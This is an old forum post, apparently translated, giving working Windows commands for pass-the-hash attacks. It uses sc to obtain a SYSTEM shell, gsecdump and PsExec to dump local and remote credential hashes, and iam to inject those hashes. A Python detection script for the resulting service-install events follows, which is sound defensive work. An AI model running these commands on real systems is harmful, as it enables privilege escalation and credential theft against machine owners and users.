HASH injection attack (pass-the-hash)

Posted 2012-11-6 21:09:29
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ]            show help
-a [ --dump_all ]        dump all secrets
-l [ --dump_lsa ]        dump lsa secrets
-w [ --dump_wireless ]   dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ]     dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hash information just captured with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are good at this; admins will have their hands full now. The LM/NT hashes picked up during ARP spoofing, or the ones gethash collects, actually never need to be cracked at all; this is just using the tools. As the original article puts it well: no matter whether the password is 4 characters or 127, once you have the hash you are 100% in.
( g& N' ~2 M' Q* O+ M8 f) _) ?原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
I had a look at the original source; it seems to be from /2007/03/16. Depressing, what a gap.
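A detection-side counterpart to the sc create / PsExec steps quoted above, added here as an example and not code from the original post, from gsecdump or from PsExec: it scans System-log service-installation records (Event ID 7045) for a service whose binary is a command interpreter, for the PSEXESVC service that PsExec installs on the target, and for the SERVICE_INTERACTIVE_PROCESS bit (0x100) that `type= interact` sets in the service's registry Type value; the 7045 event itself does not carry that flag, so the example takes a registry snapshot as a second input. The key="value" log lines and the registry snapshot are constructed for this example (they are not a real Windows export format; the field names follow the event's own labels), and ExampleSvc is a made-up benign service.

```python
import re
from dataclasses import dataclass

# Bit that "sc create ... type= interact" sets in the service's registry Type value
# (HKLM\SYSTEM\CurrentControlSet\Services\<name>\Type).
SERVICE_INTERACTIVE_PROCESS = 0x100

# Service binaries that are really a command interpreter rather than a daemon.
INTERPRETERS = re.compile(r"\\(cmd|powershell|wscript|cscript)\.exe\b", re.IGNORECASE)

# Constructed sample: simplified key="value" rendering of Event ID 7045 records
# (service installed) plus one unrelated 7036 record. Not a real export format.
SAMPLE_LOG = [
    r'EventID="7045" ServiceName="shellcmdline" ServiceFileName="C:\WINDOWS\system32\cmd.exe /K start" ServiceType="user mode service" ServiceAccount="LocalSystem"',
    r'EventID="7045" ServiceName="PSEXESVC" ServiceFileName="%SystemRoot%\PSEXESVC.exe" ServiceType="user mode service" ServiceAccount="LocalSystem"',
    r'EventID="7045" ServiceName="ExampleSvc" ServiceFileName="C:\Program Files\Example\svc.exe" ServiceType="user mode service" ServiceAccount="LocalSystem"',
    r'EventID="7036" ServiceName="ExampleSvc" Message="entered the running state"',
]

# Constructed snapshot of each service's registry Type value (0x10 = own process,
# 0x110 = own process + interactive, as "type= own type= interact" produces).
REGISTRY_TYPES = {"shellcmdline": 0x110, "PSEXESVC": 0x10, "ExampleSvc": 0x10}


@dataclass
class ServiceInstall:
    name: str
    file_name: str
    account: str
    reg_type: int = 0


def parse_7045(line, registry_types):
    """Parse one constructed log line; return None for anything but a 7045 record."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    if fields.get("EventID") != "7045":
        return None
    name = fields.get("ServiceName", "")
    return ServiceInstall(
        name=name,
        file_name=fields.get("ServiceFileName", ""),
        account=fields.get("ServiceAccount", ""),
        reg_type=registry_types.get(name, 0),
    )


def reasons_for(svc):
    """Return the list of indicators that make this service installation suspicious."""
    reasons = []
    if svc.reg_type & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("interactive service (SERVICE_INTERACTIVE_PROCESS set)")
    if INTERPRETERS.search(svc.file_name):
        reasons.append("service binary is a command interpreter")
    if svc.name.upper() == "PSEXESVC":
        reasons.append("PsExec remote service installed")
    if reasons and svc.account.lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons


def scan(lines, registry_types):
    """Map service name -> indicators for every 7045 record that trips at least one."""
    hits = {}
    for line in lines:
        svc = parse_7045(line, registry_types)
        if svc is None:
            continue
        reasons = reasons_for(svc)
        if reasons:
            hits[svc.name] = reasons
    return hits


if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_LOG, REGISTRY_TYPES).items():
        print(name, "->", "; ".join(reasons))
```

On a live host the same logic applies to the 7045 records from the System log and to `sc qc <name>` or the Type value under the service's registry key; the interpreter check is the one that survives renaming the service, since the binary path is what the service control manager actually executes.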